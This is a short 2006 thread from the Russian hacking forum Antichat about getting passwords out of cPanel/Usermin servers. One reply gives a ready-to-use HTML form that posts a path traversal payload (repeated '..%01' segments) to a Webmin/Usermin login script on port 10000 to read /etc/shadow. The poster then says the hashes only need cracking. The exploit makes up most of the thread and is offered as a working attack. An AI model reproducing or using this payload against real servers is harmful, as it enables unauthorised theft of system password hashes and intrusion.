Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Пасс в cpanel (https://forum.antichat.xyz/showthread.php?t=28739)

Scripts 08.12.2006 20:26

:)

Zazil 08.12.2006 23:00

Можешь попробовать вот так. Создаем html файл следующего содержания.

<form action='http://www.domain.com:10000/session_login.cgi' method=post>
<input type=hidden name=page value='/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01
/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01
/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01
/..%01/..%01/..%01/..%01/..%01/..%01//etc/shadow'>
<table border width=40%>
<tr bgcolor=#7f7f7f> <td><b>Login to Usermin</b></td> </tr>
<tr bgcolor=#b7b7b7> <td align=center><table cellpadding=3>
<tr> <td colspan=2 align=center>You must enter a username and password to login to the Usermin server on <tt>www.fso.arac.com</tt>.</td> </tr>
<tr> <td><b>Username</b></td>
<td><input name=user size=20 value=''></td> </tr>
<tr> <td><b>Password</b></td>
<td><input name=pass size=20 type=password></td> </tr>
<tr> <td colspan=2 align=center><input type=submit value='Login'>
<input type=reset value='Clear'><br>
<input type=checkbox name=save value=1> Remember login permanently?
</td> </tr>
</table></td></tr></table><p>
<hr>
</form>

И если там уязвимая версия Cpanel, то получаем файл
/etc/shadow, дальше остается его расшифровать

m0nzt3r 09.12.2006 19:24

http://forum.antichat.ru/thread25552-cpanel.html
автор, можно было б вниз поглядеть?...


Время: 15:00